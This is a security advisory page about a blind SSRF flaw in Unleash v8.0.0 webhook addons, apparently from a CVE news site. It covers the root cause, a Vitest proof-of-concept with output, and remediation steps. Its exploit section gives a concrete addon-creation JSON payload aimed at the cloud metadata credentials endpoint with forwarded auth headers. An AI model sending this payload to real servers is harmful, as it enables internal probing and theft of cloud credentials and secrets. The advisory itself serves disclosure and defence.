Unleash, Server-Side Request Forgery (SSRF), No CVE (Medium) -DC-Aug2026-1771

Listen to this Post

The Unleash addon/integration subsystem permits operators to configure webhooks and integrations (Slack, Teams, Datadog, New Relic) with a target URL parameter. When a subscribed feature-flag event occurs, the Unleash server itself issues an HTTP request to that configured URL using the ky client. The URL is taken directly from `parameters.url` without any host validation—no allow-list, deny-list, or blocking of loopback, link-local, RFC1918, or cloud‑metadata addresses exists in the addon code path. A principal with `CREATE_ADDON` or `UPDATE_ADDON` permissions can point the server to internal endpoints such as the cloud instance metadata service (169.254.169.254), localhost services, or any RFC1918 host. The request is blind (response body not returned), but the addon logs success/status, providing a timing oracle. Additionally, the webhook forwards operator‑configured Authorization and custom headers (and Datadog forwards DD‑API‑KEY) to the chosen host, exfiltrating secrets. The full feature‑event JSON is POSTed as the body. Creating/updating addons requires root permissions, not ADMIN, and can be delegated to non‑super‑admins. The vulnerability is present in the base `fetchRetry` method (src/lib/addons/addon.ts) which calls `ky(url, …)` with no checks, and the webhook provider directly passes `parameters.url` to it (src/lib/addons/webhook.ts). The service layer only validates provider name and required parameters, not the URL. A source‑wide search for internal‑IP guards finds none. The same unguarded sink backs all providers. The attacker model: authenticated user with `CREATE_ADDON` or `UPDATE_ADDON` root permission. Impact: classic SSRF (CWE‑918) allowing internal service probing, metadata access, and credential exfiltration. A complete PoC using Vitest demonstrates the server dialing a loopback listener with forwarded headers and recording success. Remediation requires server‑side URL validation at create/update and request time, blocking internal IPs and constraining redirects.

DailyCVE Form:

Platform: Unleash v8.0.0
Version: v8.0.0 (affects)
Vulnerability: SSRF blind header
Severity: Medium
Date: 2026-08-21

Prediction: No patch yet

What Undercode Say:

Analytics from PoC execution:

Setup (in a throwaway clone)
git clone --depth 1 --branch v8.0.0 https://github.com/Unleash/unleash unleash
cd unleash
corepack pnpm install --prefer-offline

Create `vitest.poc.config.ts`:

import { defineConfig, configDefaults } from 'vitest/config';
export default defineConfig({
test: {
globals: true,
setupFiles: ['./src/test/errorWithMessage.ts'],
testTimeout: 30000,
exclude: [...configDefaults.exclude, 'frontend/', 'dist/'],
environment: 'node',
},
});

Create `src/lib/addons/ssrf-poc.test.ts` (core test file with internal listener and two tests).

Run:

npx vitest run --config vitest.poc.config.ts src/lib/addons/ssrf-poc.test.ts

Observed output:

RUN v4.1.5
stdout | src/lib/addons/ssrf-poc.test.ts > ... > server dials ...
[bash] SSRF confirmed -> internal hit: {"path":"/latest/meta-data/iam/security-credentials/","auth":"Bearer operator-webhook-secret","secret":"leaked-to-internal-host","body":"{\"id\":1, ... }"}
✓ ... (2 passed)

Analytics confirm the internal listener received the request with exfiltrated headers, and the addon logged success.

Exploit: (Educational Purposes!)

  • As an authenticated user with `CREATE_ADDON` or UPDATE_ADDON, send a POST to `/api/admin/addons` with payload:
    {
    "provider": "webhook",
    "enabled": true,
    "events": ["feature-created"],
    "parameters": {
    "url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
    "authorization": "Bearer stolen-token",
    "customHeaders": "{\"X-Evil\":\"leak\"}"
    }
    }
    
  • Trigger a feature flag event (e.g., create or toggle a flag) to force the server to call the internal URL.
  • The server issues a POST to the internal endpoint with the full event JSON and forwarded headers; success/status appears in integration-event log.

Protection:

  • Validate `url` server‑side at create/update (addon‑service.ts) and at request time (addon.ts fetchRetry).
  • Allow only http/https; resolve hostname and reject if any resolved IP is loopback (127.0.0.0/8, ::1), link‑local (169.254.0.0/16, fe80::/10, including 169.254.169.254), private (10/8, 172.16/12, 192.168/16, fc00::/7), or non‑public.
  • Use DNS‑rebinding‑safe check: pin resolved IP and connect to that IP.
  • Disable or constrain HTTP redirects to prevent bouncing to internal hosts.
  • Optionally provide an allow‑list for operators who legitimately need internal hooks.
  • Apply guard uniformly to all providers using fetchRetry.
  • Consider not forwarding Authorization/customHeaders to non‑allow‑listed hosts.

Impact:

  • SSRF enables internal service probing, cloud metadata access, and port scanning via blind oracle.
  • Exfiltration of operator‑configured secrets (Authorization headers, customHeaders, and Datadog API keys) to attacker‑chosen internal hosts.
  • Full feature‑event payload delivered to internal endpoints.
  • Scope changed: vulnerable Unleash server attacks internal network/metadata service.
  • Medium severity due to blind nature and prerequisite of addon‑management permissions.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top